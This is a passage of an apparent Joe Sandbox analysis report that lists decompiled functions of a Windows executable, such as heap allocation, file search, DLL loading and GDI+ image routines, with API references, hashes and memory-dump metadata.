                                                    0x00ceace8
                                                    0x00000000
                                                    0x00ceace8
                                                    0x00cead0f
                                                    0x00000000
                                                    0x00cead0f
                                                    0x00ceacc8
                                                    0x00000000

                                                    APIs
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00CEACF8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AddressProc
                                                    • String ID:
                                                    • API String ID: 190572456-0
                                                    • Opcode ID: 43af63536b91818c2b5aee8d3db4dc6179f403e96b6d50d976dd545e5078ed0e
                                                    • Instruction ID: 7824f002ddf0c2e71f09eec35e9ec191c81d99eda7c2d86d0247025a063c3941
                                                    • Opcode Fuzzy Hash: 43af63536b91818c2b5aee8d3db4dc6179f403e96b6d50d976dd545e5078ed0e
                                                    • Instruction Fuzzy Hash: 31110633A002756F9B269E2FEC40A6A7395AB847607264221FC25EB264D731FE01C7D3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDDA52 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 76%
                                                    			E00CDDA52(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				intOrPtr _t19;
				char _t20;
				char _t21;
				void* _t24;
				void* _t25;
				void* _t38;
				void* _t44;
				intOrPtr _t46;

				_t38 = __edx;
				E00CDEB78(0xcf2b3c, _t44);
				_push(__ecx);
				E00CDEC50(0x2108);
				_push(_t25);
				 *((intOrPtr*)(_t44 - 0x10)) = _t46;
				E00CE6066(0xd15872, "X");
				E00CD0659(0xd17894, _t38, 0xcf35f0);
				E00CE6066(0xd16892,  *((intOrPtr*)(_t44 + 0xc)));
				E00CC5B3D(0xd0c578, _t38,  *((intOrPtr*)(_t44 + 0xc)));
				_t4 = _t44 - 4;
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				_t19 = 2;
				 *0xd14850 = _t19;
				 *0xd1484c = _t19;
				 *0xd14848 = _t19;
				_t20 =  *0xd08461; // 0x0
				 *0xd136d3 = _t20;
				_t21 =  *0xd08462; // 0x1
				_push(0xd0c578);
				 *0xd1370c = 1;
				 *0xd1370f = 1;
				 *0xd136d4 = _t21;
				E00CC7B0D(_t44 - 0x2118, _t38,  *_t4);
				 *(_t44 - 4) = 1;
				E00CC7C7D(_t44 - 0x2118, _t38,  *_t4);
				_t24 = E00CC7B9E(_t25, _t44 - 0x2118); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t44 - 0xc));
				return _t24;
			}












                                                    0x00cdda52
                                                    0x00cdda57
                                                    0x00cdda5c
                                                    0x00cdda62
                                                    0x00cdda67
                                                    0x00cdda6a
                                                    0x00cdda77
                                                    0x00cdda88
                                                    0x00cdda95
                                                    0x00cddaa6
                                                    0x00cddaab
                                                    0x00cddaab
                                                    0x00cddab7
                                                    0x00cddab8
                                                    0x00cddabd
                                                    0x00cddac2
                                                    0x00cddac7
                                                    0x00cddacc
                                                    0x00cddad1
                                                    0x00cddad6
                                                    0x00cddad7
                                                    0x00cddade
                                                    0x00cddae5
                                                    0x00cddaea
                                                    0x00cddaf5
                                                    0x00cddaf9
                                                    0x00cddb04
                                                    0x00cddb0e
                                                    0x00cddb17

                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CDDA57
                                                      • Part of subcall function 00CD0659: _wcslen.LIBCMT ref: 00CD066F
                                                      • Part of subcall function 00CC7B0D: __EH_prolog.LIBCMT ref: 00CC7B12
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog$_wcslen
                                                    • String ID:
                                                    • API String ID: 2838827086-0
                                                    • Opcode ID: 4eb017e650bf76210ba4a64dc70bf37996d54f58d4283742e58122ad2470b5c7
                                                    • Instruction ID: 0eab2f05e8b28fb3696aeb40fe79722b5c8234f377c2acfb94f23a170c5a3d4d
                                                    • Opcode Fuzzy Hash: 4eb017e650bf76210ba4a64dc70bf37996d54f58d4283742e58122ad2470b5c7
                                                    • Instruction Fuzzy Hash: 5B110175508384BED710ABA8E806BDC3FA0DB25310F00809EF24596392CFB05A45EB72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC9215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 55%
                                                    			E00CC9215(void* __ebx, void* __edi, void* __eflags) {
				void* _t21;
				intOrPtr _t27;
				intOrPtr _t36;
				void* _t38;
				intOrPtr _t39;
				void* _t41;
				void* _t48;

				E00CDEB78(0xcf2895, _t41);
				E00CC13BA(_t41 - 0x20, E00CC7C64());
				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
				_t39 = E00CCD114( *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 - 0x20)),  *((intOrPtr*)(_t41 - 0x1c)), _t38);
				if(_t39 > 0) {
					_t27 =  *((intOrPtr*)(_t41 + 0x10));
					_t36 =  *((intOrPtr*)(_t41 + 0xc));
					do {
						_t48 = 0 - _t27;
						if(_t48 > 0 || _t48 >= 0 && _t39 >= _t36) {
							_t39 = _t36;
						}
						if(_t39 > 0) {
							E00CCD300( *((intOrPtr*)(_t41 + 8)), _t41,  *((intOrPtr*)(_t41 - 0x20)), _t39);
							asm("cdq");
							_t36 = _t36 - _t39;
							asm("sbb ebx, edx");
						}
						_push( *((intOrPtr*)(_t41 - 0x1c)));
						_push( *((intOrPtr*)(_t41 - 0x20)));
						_t39 = E00CCD114( *((intOrPtr*)(_t41 + 8)));
					} while (_t39 > 0);
				}
				_t21 = E00CC15FB(_t41 - 0x20); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
				return _t21;
			}










                                                    0x00cc921a
                                                    0x00cc922c
                                                    0x00cc923a
                                                    0x00cc9243
                                                    0x00cc9247
                                                    0x00cc924a
                                                    0x00cc924e
                                                    0x00cc9251
                                                    0x00cc9253
                                                    0x00cc9255
                                                    0x00cc925d
                                                    0x00cc925d
                                                    0x00cc9261
                                                    0x00cc926a
                                                    0x00cc9271
                                                    0x00cc9272
                                                    0x00cc9274
                                                    0x00cc9274
                                                    0x00cc9276
                                                    0x00cc927c
                                                    0x00cc9284
                                                    0x00cc9286
                                                    0x00cc928b
                                                    0x00cc928f
                                                    0x00cc9298
                                                    0x00cc92a0

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 9b86a420fd1fafcd29df486741ddc59666483f0e81ca7afbc521abb421a9c489
                                                    • Instruction ID: 855139c5af4f0fa2fd384bcbe2168cb0eb52ea5583a86be99f968f6cd247530e
                                                    • Opcode Fuzzy Hash: 9b86a420fd1fafcd29df486741ddc59666483f0e81ca7afbc521abb421a9c489
                                                    • Instruction Fuzzy Hash: FC01A533900568ABCF21BBA8CC85FDEB731EF88750F05412DE812B7262DA34CE01D6A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CE3C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CE3C0D(void* __ecx, signed int _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				_Unknown_base(*)()* _t10;
				struct HINSTANCE__* _t12;
				_Unknown_base(*)()* _t13;
				_Unknown_base(*)()** _t19;
				signed int _t20;
				signed int _t21;

				_t19 = 0xd220ec + _a4 * 4;
				_t10 =  *_t19;
				_t21 = _t20 | 0xffffffff;
				if(_t10 == _t21) {
					L6:
					return 0;
				}
				if(_t10 == 0) {
					_t12 = E00CE3B72(__ecx, _a12, _a16); // executed
					if(_t12 == 0) {
						L5:
						 *_t19 = _t21;
						goto L6;
					}
					_t13 = GetProcAddress(_t12, _a8);
					if(_t13 == 0) {
						goto L5;
					}
					 *_t19 = _t13;
					return _t13;
				}
				return _t10;
			}









                                                    0x00ce3c15
                                                    0x00ce3c1c
                                                    0x00ce3c1f
                                                    0x00ce3c24
                                                    0x00ce3c51
                                                    0x00000000
                                                    0x00ce3c51
                                                    0x00ce3c28
                                                    0x00ce3c30
                                                    0x00ce3c39
                                                    0x00ce3c4f
                                                    0x00ce3c4f
                                                    0x00000000
                                                    0x00ce3c4f
                                                    0x00ce3c3f
                                                    0x00ce3c47
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce3c4b
                                                    0x00000000
                                                    0x00ce3c4b
                                                    0x00ce3c56

                                                    APIs
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00CE3C3F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AddressProc
                                                    • String ID:
                                                    • API String ID: 190572456-0
                                                    • Opcode ID: 4492134fe61d5968e261445a28b753d61389895d64bd539feadaa65d39c63994
                                                    • Instruction ID: 54bc5e34ec55069b1d0ad9591c5cd6fe9b2d83cceea6c986e8d265f5f70416a9
                                                    • Opcode Fuzzy Hash: 4492134fe61d5968e261445a28b753d61389895d64bd539feadaa65d39c63994
                                                    • Instruction Fuzzy Hash: 50F0EC322003D6AFCF114E6AEC08A9A7799EF05B617204225FA25E7190DB31FB20D7A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CE8E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 94%
                                                    			E00CE8E06(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = _a4;
				if(_t9 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00CE91A8())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t9 == 0) {
					_t9 = _t9 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0xd226e4, 0, _t9); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00CE8C34();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00CE7A5E(_t7, _t8, __eflags, _t9);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}








                                                    0x00ce8e06
                                                    0x00ce8e0c
                                                    0x00ce8e12
                                                    0x00ce8e44
                                                    0x00ce8e49
                                                    0x00ce8e4f
                                                    0x00000000
                                                    0x00ce8e4f
                                                    0x00ce8e16
                                                    0x00ce8e18
                                                    0x00ce8e18
                                                    0x00ce8e2f
                                                    0x00ce8e38
                                                    0x00ce8e40
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce8e20
                                                    0x00ce8e22
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce8e25
                                                    0x00ce8e2a
                                                    0x00ce8e2b
                                                    0x00ce8e2d
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce8e2d
                                                    0x00000000

                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00CE4286,?,0000015D,?,?,?,?,00CE5762,000000FF,00000000,?,?), ref: 00CE8E38
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: 35cdcb80a53a44cce55ae00700c8830a68443657887ef70157421ad1641a49d2
                                                    • Instruction ID: 7ada6ce07a8dbf83b07d9e6e4def2aa53132b651da481db04842e52c71dfdf8c
                                                    • Opcode Fuzzy Hash: 35cdcb80a53a44cce55ae00700c8830a68443657887ef70157421ad1641a49d2
                                                    • Instruction Fuzzy Hash: 86E06D3A2062E567EA7127679D05BAF76499B427B4F150121BC2C97191CF60CE0592E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC5ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 93%
                                                    			E00CC5ABD(intOrPtr __ecx, void* __eflags) {
				void* _t36;

				E00CDEB78(0xcf2739, _t36);
				_push(__ecx);
				 *((intOrPtr*)(_t36 - 0x10)) = __ecx;
				E00CCB505(__ecx); // executed
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				E00CD0637();
				 *(_t36 - 4) = 1;
				E00CD0637();
				 *(_t36 - 4) = 2;
				E00CD0637();
				 *(_t36 - 4) = 3;
				E00CD0637();
				 *(_t36 - 4) = 4;
				E00CD0637();
				 *(_t36 - 4) = 5;
				E00CC5CAC(__ecx,  *(_t36 - 4));
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return __ecx;
			}




                                                    0x00cc5ac2
                                                    0x00cc5ac7
                                                    0x00cc5acb
                                                    0x00cc5ace
                                                    0x00cc5ad3
                                                    0x00cc5add
                                                    0x00cc5ae8
                                                    0x00cc5aec
                                                    0x00cc5af7
                                                    0x00cc5afb
                                                    0x00cc5b06
                                                    0x00cc5b0a
                                                    0x00cc5b15
                                                    0x00cc5b19
                                                    0x00cc5b20
                                                    0x00cc5b24
                                                    0x00cc5b2f
                                                    0x00cc5b37

                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CC5AC2
                                                      • Part of subcall function 00CCB505: __EH_prolog.LIBCMT ref: 00CCB50A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: afa72da564cdf59b12284fc9826a872f24ff522b4188ff4544a24d7ac92243a9
                                                    • Instruction ID: f57993e6aac6344007171e647144eec5a3d76b19c30e47a6edccf918f6c4f901
                                                    • Opcode Fuzzy Hash: afa72da564cdf59b12284fc9826a872f24ff522b4188ff4544a24d7ac92243a9
                                                    • Instruction Fuzzy Hash: 4C018C30810794DAD725F7B8C0417EDFBA49F64304F68848EA95653382CBB46B09E7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC9620 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 89%
                                                    			E00CC9620(void* __ecx) {
				void* _t16;
				void* _t21;

				_t21 = __ecx;
				_t16 = 1;
				if( *(__ecx + 8) != 0xffffffff) {
					if( *((char*)(__ecx + 0x15)) == 0 &&  *((intOrPtr*)(__ecx + 0x10)) == 0) {
						_t5 = FindCloseChangeNotification( *(__ecx + 8)) - 1; // -1
						asm("sbb bl, bl");
						_t16 =  ~_t5 + 1;
					}
					 *(_t21 + 8) =  *(_t21 + 8) | 0xffffffff;
				}
				 *(_t21 + 0x10) =  *(_t21 + 0x10) & 0x00000000;
				if(_t16 == 0 &&  *((intOrPtr*)(_t21 + 0x1e)) != _t16) {
					E00CC6BD5(0xd01098, _t21 + 0x32);
				}
				return _t16;
			}





                                                    0x00cc9622
                                                    0x00cc9624
                                                    0x00cc962a
                                                    0x00cc9630
                                                    0x00cc9641
                                                    0x00cc9646
                                                    0x00cc9648
                                                    0x00cc9648
                                                    0x00cc964a
                                                    0x00cc964a
                                                    0x00cc964e
                                                    0x00cc9654
                                                    0x00cc9664
                                                    0x00cc9664
                                                    0x00cc966d

                                                    APIs
                                                    • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00CC95D6,?,?,?,?,?,00CF2641,000000FF), ref: 00CC963B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ChangeCloseFindNotification
                                                    • String ID:
                                                    • API String ID: 2591292051-0
                                                    • Opcode ID: 38cb123a5dce571631a17392b854281b1b7c788a1d3932988227d428c2ac61fb
                                                    • Instruction ID: 210fb91f7e8d684acc0e6d22dbfee8ce981e6e9a22c00fec4375d085a31e97ed
                                                    • Opcode Fuzzy Hash: 38cb123a5dce571631a17392b854281b1b7c788a1d3932988227d428c2ac61fb
                                                    • Instruction Fuzzy Hash: 5FF08270481B559FDB308A24C55CF92B7E8EB12321F045B5EE0F7429E0D771AA8DDA50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CCA56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CCA56D(void* __ecx, void* __eflags, WCHAR* _a4, intOrPtr _a8) {
				void* _t13;
				intOrPtr _t19;

				_t19 = _a8;
				 *((char*)(_t19 + 0x1044)) = 0;
				if(E00CCBDB4(_a4) != 0) {
					L3:
					return 0;
				}
				_t13 = E00CCA69B(0xffffffff, _a4, _t19); // executed
				if(_t13 == 0xffffffff) {
					goto L3;
				}
				FindClose(_t13); // executed
				 *(_t19 + 0x1040) =  *(_t19 + 0x1040) & 0x00000000;
				 *((char*)(_t19 + 0x100c)) = E00CCA28F( *((intOrPtr*)(_t19 + 0x1008)));
				 *((char*)(_t19 + 0x100d)) = E00CCA2A6( *((intOrPtr*)(_t19 + 0x1008)));
				return 1;
			}





                                                    0x00cca56e
                                                    0x00cca576
                                                    0x00cca584
                                                    0x00cca5cb
                                                    0x00000000
                                                    0x00cca5cb
                                                    0x00cca58d
                                                    0x00cca595
                                                    0x00000000
                                                    0x00000000
                                                    0x00cca598
                                                    0x00cca5a4
                                                    0x00cca5b6
                                                    0x00cca5c1
                                                    0x00000000

                                                    APIs
                                                      • Part of subcall function 00CCA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA6C4
                                                      • Part of subcall function 00CCA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA6F2
                                                      • Part of subcall function 00CCA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA6FE
                                                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CCA598
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Find$FileFirst$CloseErrorLast
                                                    • String ID:
                                                    • API String ID: 1464966427-0
                                                    • Opcode ID: 3e3b6985d9a27902eb593dac6d668d6fdb1ae65fcc68f8713c9ca3f3d2268a79
                                                    • Instruction ID: 32c283802877f1229fdfe14fcd86076f67a26e894a71bfe1e0b321be27d71cc8
                                                    • Opcode Fuzzy Hash: 3e3b6985d9a27902eb593dac6d668d6fdb1ae65fcc68f8713c9ca3f3d2268a79
                                                    • Instruction Fuzzy Hash: A4F08232408794BACB2257B4C909FDB7B906F1A339F04CA4EF1FD52196C2755494AB23
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CD0E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 75%
                                                    			E00CD0E08() {
				void* __esi;
				void* _t2;

				L00CD1B58(); // executed
				_t2 = E00CD1B5D();
				if(_t2 != 0) {
					_t2 = E00CC6C31(_t2, 0xd01098, 0xff, 0xff);
				}
				if( *0xd010a4 != 0) {
					_t2 = E00CC6C31(_t2, 0xd01098, 0xff, 0xff);
				}
				__imp__SetThreadExecutionState(1);
				return _t2;
			}





                                                    0x00cd0e0a
                                                    0x00cd0e0f
                                                    0x00cd0e20
                                                    0x00cd0e25
                                                    0x00cd0e25
                                                    0x00cd0e31
                                                    0x00cd0e36
                                                    0x00cd0e36
                                                    0x00cd0e3d
                                                    0x00cd0e45

                                                    APIs
                                                    • SetThreadExecutionState.KERNEL32 ref: 00CD0E3D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ExecutionStateThread
                                                    • String ID:
                                                    • API String ID: 2211380416-0
                                                    • Opcode ID: a2fff5917558af266c41d03f85d9d8ddc9c93afd0710df3807fa6bbb89bcd25a
                                                    • Instruction ID: 3a7886db9a5b74c353ab8a8bed5ffb4bbb9e2685abf7b9c34ebf2ed297013d6e
                                                    • Opcode Fuzzy Hash: a2fff5917558af266c41d03f85d9d8ddc9c93afd0710df3807fa6bbb89bcd25a
                                                    • Instruction Fuzzy Hash: 9ED0C25060109436EA1137286915BFE26068FC6311F0C002BF68957782CE840886B272
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDA626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 68%
                                                    			E00CDA626(signed int __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t6;

				_push(__ecx);
				_push(0x10);
				L00CDEB02();
				_v8 = __eax;
				if(__eax == 0) {
					return 0;
				}
				_t6 = E00CDA3B9(__eax, _a4, _a8); // executed
				return _t6;
			}





                                                    0x00cda629
                                                    0x00cda62a
                                                    0x00cda62c
                                                    0x00cda631
                                                    0x00cda636
                                                    0x00000000
                                                    0x00cda647
                                                    0x00cda640
                                                    0x00000000

                                                    APIs
                                                    • GdipAlloc.GDIPLUS(00000010), ref: 00CDA62C
                                                      • Part of subcall function 00CDA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CDA3DA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
